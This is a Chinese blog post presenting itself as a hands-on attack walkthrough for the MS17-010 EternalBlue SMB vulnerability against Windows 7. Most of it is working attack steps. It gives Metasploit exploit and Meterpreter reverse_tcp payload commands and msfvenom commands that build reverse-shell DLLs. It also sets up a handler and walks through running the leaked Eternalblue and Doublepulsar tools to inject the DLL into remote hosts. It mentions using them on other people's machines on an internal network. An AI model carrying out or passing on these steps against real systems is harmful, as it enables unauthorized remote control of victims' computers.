MS17_010永恒之蓝实战攻击

最新推荐文章于 2023-10-25 22:43:25 发布
最新推荐文章于 2023-10-25 22:43:25 发布
阅读量1.3k 收藏 8
点赞数 4
分类专栏: 信息安全 文章标签: 信息安全 永恒之蓝 SMB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uiop_uiop_uiop/article/details/85345535
版权

早就听说了大名鼎鼎的永恒之蓝漏洞,最近终于决定实战爽一爽了。

关于漏洞的成因,后面有时间专门找时间研究一下,到时候再把博客发出来。这里先利用shadowbrokers的“官方”漏洞poc程序exe进行exploit。然后Doublepulsar将meterpreter-shell的dll注入到远程主机的系统进程当中。

metaspolit当中可以很快的攻击:

在这里贴一下方法:

1、打开metaspolit

2、启动完成之后输入:

search eternalblue

3、因为我这里机器是win7的,所以选第二个。win8+的试试第三个。

use exploit/windows/smb/ms17_010_eternalblue

show payloads

 4、在出来的一堆payload里面选择你想要的。这里我选择Meterpreter反向shell:一定要对应系统架构!

x64:

set payload windows/x64/meterpreter/reverse_tcp

x86:

set payload windows/meterpreter/reverse_tcp

 5、查看需要的参数

show options

 

 6、按照上面要求填写目标主机地址RHOST、自己接收shell的主机地址LHOST(一般就是这个kali了,设置成自己kali当前的ip)。(真的可以说是 指哪打哪了!!)

set rhost 【目标地址】
set lhost 【接收反弹回来shell的主机地址】

7、输入

exploit

 然后就看他的表演了~~~过一会shell就来了。

(截图只留了当时用cmdshell做payload的,用上面meterpretershell的话是出来是下面这样,都一样啦) 

 

利用“官方工具”的方法:

首先下载漏洞poc:

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

配置xml选项:

把里面的%选项都改成你要的值,一般就按照默认值填写就可以。差不多就是上图的结果,两个【】的内容按照目标机情况进行填写。第二个架构,要么是XP,要么是WIN72K8R2。可以先使用nmap工具扫扫确定是不是xp。

这样漏洞exp配置就ok了,我们还需要准备好恶意payload来获取权限。这里请出KALI-LINUX虚拟机,使用msf框架生成payload。这样生成好payload之后就可以交给Doublepulsar注入了。

(在开机的时候,注意调整虚拟机的网络连接选项,如果你是要用自己的电脑去打内网里别人的电脑,网络选项要选择桥接模式,然后在虚拟机里面将网络配置好,比如分配ip或者选dhcp。如果自己打自己的虚拟机体验的话,受害机是NAT的话KALI也要是NAT,或者两个都桥接也可。)

这里有很多种payload可以选。cmd-shell,meterpreter-shell。vncserver

在生成 dll 之前,咱首先要学习下 metasploit 中的 meterpreter 的几种类型:

meterpreter 就是一个跨平台的 shell,功能很强大,嘿嘿嘿。通常来说 meterpreter 有这么两种模式:正向和反向

bind:攻击者连接目标机器的模式,通常比较适合内网渗透,有时会被防火墙拦下,也就是常说的正向连接。

reverse:目标机连接攻击者的模式,基本上不会被防火墙阻拦。估计岁数大的小盆友们可能知道灰鸽子?这玩意就是反弹到攻击者的。这就是常说的反向连接。

当然,这俩还能够细分为 tcp、http、https

这里我们选择更保险的reverse反向连接

打开终端输入:

#32位
msfvenom -p windows/meterpreter/reverse_tcp RHOST=【接收shell主机地址】 LPORT=8089 -f dll >x86reverse.dll
#64位
msfvenom -p windows/x64/meterpreter/reverse_tcp RHOST=【接收shell主机地址】 LPORT=8089 -f dll >x64reverse.dll

 这样在/root目录下就有了这个。复制到windows下。

在metaspolit当中配置shell接收:

set PAYLOAD windows/meterpreter/reverse_tcp
use exploit/multi/handler
set lhost 【接收shell主机地址,一般用当前kali地址】
set LPORT 8089
run

dll准备好了,可以打了!

在deps目录下新开一个cmd,直接Eternalblue-2.2.0.exe回车。

最后显示===WIN===之后,可以继续!不然就是受害机蓝屏了啥的。。等一会可以在搞他会重启。

不蓝屏的话,就可以继续了。

把x86reverse.dll / x64reverse.dll拷到deps目录,配置Doublepulsar-1.3.1.xml

 

然后 cmd里Doublepulsar-1.3.1.exe

注入dll。

 注入之后可能会出现这个:

这毕竟是个内核ring0下的东西,有点差错就会有各种各样奇怪的错误。从注入dll之后开始计时。这样他1min之后会重启,但是你的shell还能用,所以可以抓紧上传其他的控制server。等他重启在接着打永恒之蓝,再出现这个的概率会小很多。

如果一切正常的话,被害机应该是毫无动静di。

这时候切换回kali,就发现shell已经来了。

开俩虚拟机有点卡,实际会比较快的。 

然后剩下的操作,去查阅meterpreter用法即可。操作多多~~

uiop_uiop_uiop
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
永恒之蓝ms17010)漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以将文件从隔离区恢复,添加信任。 下载后假设文件解压放在D盘 运行方式: 一、直接打开ms17010目录,运行“点我运行.bat”。如果运行报错 “The system cannot write to the specified device”,用以下方式运行。 二、 1.1 Win键+R键,打开运行,输入:cmd 2.1 在终端输入:cd /d d:\ms17010 3.1 测试本机:ms17010pc.exe 127.0.0.1 测试远程单机:ms17010pc.exe 目的IP (注意命令和IP之间有个空格) 3.2 网段批量测试:ms17010.exe 目的网段 例如:ms17010.exe 192.168.188.0/24 (注意命令和IP之间有个空格)
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
ms17_010的几种打法
Innocence_0的博客
08-15 398
ms17_010是内网的必争之地,很多时候需要借助此漏洞来进行横向,由于多次遇到该漏洞时msf无法利用成功,就通过查阅资料来复现ms17_010的几种打法并在实战中成功。
内网安全——利用NSA Smbtouch批量检测内网
收集盒 Book box
05-01 8716
0x00 前言 最近,NSA渗透工具被曝光,其中包含多个Windows远程漏洞利用工具,影响很大 本文不会具体介绍这些远程漏洞工具的使用方法,而是站在防御者的角度,介绍如何利用这些工具,更好的去保护自己的内网 0x01 简介 本文将要介绍以下内容: FuzzBunch使用流程 Smbtouch功能介绍 编写python脚本实现批量检测内网是否存在可被S
永恒之蓝实战演练
m0_57530199的博客
07-12 375
永恒之蓝简介 永恒之蓝:2017年5月13日起,全球范围内爆发的基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝攻击程序发起的网络攻击事件。英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。微软已于2017 年 3 月 14 日发布MS17-010补丁,修复了“永恒之蓝攻击的系统漏洞。 注:本演示环境使用虚拟环境模拟搭建,非真实攻击,请严格遵守国家安全法规!! 实验环
MS17-010永恒之蓝)漏洞分析与复现
热门推荐
未完成的歌~的博客
03-12 5万+
文章目录一、漏洞简介1、永恒之蓝介绍:2、漏洞原理:3、影响版本:二、漏洞复现复现环境:复现过程:1、主机发现:2、使用MSF的永恒之蓝漏洞模块3、使用ms17-010扫描模块,对靶机进行扫描:4、使用ms17-010攻击模块,对靶机进行攻击5、得到靶机shell6、通过shell对靶机进行控制 一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露
网安永恒之蓝MS17-010检测工具.zip
03-01
永恒之蓝MS17-010,漏洞检测工具
ms17-101补丁,永恒之蓝补丁
11-25
有效防止基于msb攻击的病毒,永恒之蓝,蠕虫病毒。。。。
ms17_010_psexec.rb
04-11
msfconsole中17010永恒之蓝模块。获取权限必备
ms17-010永恒之蓝) 漏洞复现与处理
diaobusi的博客
06-05 9273
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝ms17_010)为例
weoptions的博客
09-21 3174
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
永恒之蓝漏洞 ms17_010 详解
qq_45953122的博客
10-25 3105
永恒之蓝ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
Eternalblue-2.2.0 shellcode 分析
pureman_mega的博客
12-09 576
shellcode 部分支持32和64位系统,在执行开始会进行判断并分发,如下图: 32 64 (这个细节点是看别人博客写的)同样的机器码,在32和64位处理器中解析是不同的指令,以此来区分32和64位系统。可以通过ida分别以32和64位模式打开shellcode来查看。 64位shellcode正文部分: 000000005BF sub_5BF proc near ; CODE XREF
ms17-010 永恒之蓝
qq_62803993的博客
01-12 2802
什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
ms_17_010漏洞利用
qq_46635165的博客
04-29 930
ms17_010漏洞利用复现 ms17_010漏洞原理 能力有限,请参见大佬的blog:https://blog.csdn.net/luoshenwei3533/article/details/82931999 环境准备 kali 作为攻击方 IP 10.1.1.1 win2003 作为受害方 IP 10.1.1.2 漏洞利用条件 win2003 开启了445端口(默认是开启的),未打漏洞补丁 win2003 关闭防火墙 二者能够相互ping通 简单的信息收集 1)假设攻击方目前不知道目标主机的端口,
MSF复现 ms17_010永恒之蓝
beichenyyds的博客
03-01 2053
Metasploit Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。 MSF的更新 apt update apt install metasploit-
永恒之蓝MS17-010实战案例
qq_36585338的博客
11-26 757
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
MS17_010利用总结
qq_43766053的博客
10-25 3094
MS17_010利用总结 一、 什么是MS17_010 MS17_010也就是我们常说的永恒之蓝漏洞,爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 漏洞出现在Windows SMB
网络安全-MS17-010漏洞-永恒之蓝
weixin_48137911的博客
02-14 3489
攻击主机上打开了目标机器的桌面,攻击成功,这个时候只要我把它原本的账户删了,不断电的情况下,我想干嘛干嘛,他就再也进不来了,除非断电,重装。这个漏洞呢,在win10是不可以的,win8也是不行滴,只有win7以及以下的电脑,才有这个漏洞,因为win7之后微软把他给修复了。账户已经建立了,试想一波,如果我是真正的入侵者,我都有你账户了,我进你系统不是轻轻松松,账户密码都是我自己设置的。.无论怎么输入都没用,因为这个账号已经被我删掉了,或者我想放什么恶意程序木马在里面,隐藏起来,他也不知道的呀~
永恒之蓝ms17_010漏洞复现实验
最新发布
01-03
很抱歉,根据提供的引用内容,我无法提供关于永恒之蓝MS17-010漏洞的复现实验。这是因为复现该漏洞需要特定的环境和设备,并且涉及到非法活动。我强烈建议您不要尝试复现该漏洞,以免违法和造成不必要的损失。 如果您对网络安全感兴趣,我可以为您提供一些关于网络安全的基础知识和防护措施。请问您对此感兴趣吗?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值